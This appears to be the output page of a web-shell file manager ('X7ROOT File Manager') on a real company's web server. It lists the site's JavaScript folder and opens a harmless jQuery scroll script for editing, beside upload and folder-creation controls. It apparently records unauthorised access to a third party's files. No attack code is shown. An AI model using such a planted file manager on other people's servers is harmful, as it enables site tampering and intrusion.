X7ROOT File Manager
Current Path:
/var/www/vhosts/hwtw.com.tw/httpdocs/js
var
/
www
/
vhosts
/
hwtw.com.tw
/
httpdocs
/
js
/
📁
..
📄
bootstrap.min.js
(38.75 KB)
📄
bootstrap.min_4.js
(58.6 KB)
📁
country-select-js
📄
effect.js
(5.91 KB)
📄
effect_20200916.js
(5 KB)
📁
fancybox
📄
jquery.appear.js
(2.7 KB)
📄
jquery.easing.1.3.js
(7.91 KB)
📄
jquery.flexslider-min.js
(20.92 KB)
📄
jquery.isotope.min.js
(15.66 KB)
📄
jquery.js
(90.92 KB)
📄
jquery.localScroll.min.js
(1.36 KB)
📄
jquery.nicescroll.min.js
(58.6 KB)
📄
jquery.scrollTo-1.4.3.1-min.js
(2.38 KB)
📄
jquery.scrollTo.min.js
(2.38 KB)
📄
main.js
(687 B)
📄
skrollr.min.js
(10.95 KB)
📄
stellar.js
(22.74 KB)
Editing: main.js
(function($) { $(window).scroll(function() { if ($(this).scrollTop() > 100) { $('.scrollup').fadeIn(); } else { $('.scrollup').fadeOut(); } }); $('.scrollup').click(function() { $("html, body").animate({ scrollTop: 0 }, 1000); return false; }); // local scroll jQuery('.navbar').localScroll({ hash: true, offset: { top: 0 }, duration: 800, easing: 'easeInOutExpo' }); $('.scrollto').on('click', function(e) { e.preventDefault(); var target = $(this.hash); $('html, body').animate({ scrollTop: target.offset().top - 60 }, 1500, 'easeInOutExpo'); }); })(jQuery);
Upload File
Create Folder